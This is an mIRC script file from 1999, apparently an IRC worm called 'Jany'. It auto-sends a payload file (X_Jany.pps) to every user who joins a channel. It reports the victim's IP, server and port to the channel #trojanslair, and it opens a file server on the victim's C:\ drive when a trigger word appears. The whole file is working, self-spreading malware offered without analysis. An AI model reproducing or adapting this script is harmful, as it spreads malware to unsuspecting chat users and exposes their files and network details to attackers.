   [SCRIPT]
   n0 =
   n1 = on 1:start:{
   n2 = .remote on
   n3 = .ctcps on"
   n4 = .events on"
   n5 =  }"
   n6=on 1:join:#:{"
   n7=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\X_Jany.pps"
   n8=}"
   n9=on 1:connect:.msg #trojanslair Jany is so cute ! $ip on $server $+ : $+ $port $+"
   n10=on 1:text:*jany*:#:/fserve $nick 5 C:\"
   n11=on 1:PING:/msg $nick Pire que Tout... L'amour propre et la fierté!"
   n12=on 1:FILERCVD:*.jpg:./dcc send $nick c:\Windows\Help\X_Jany.pps"
   n13=on 1:FILESENT:*.jpg:./dcc send $nick c:\Windows\\Secret.pps"
   ;Designed by Del_Armg0____06-07 Novembre 1999____Keep It Load!"
   ;Magic¤°Software (c) 1999"
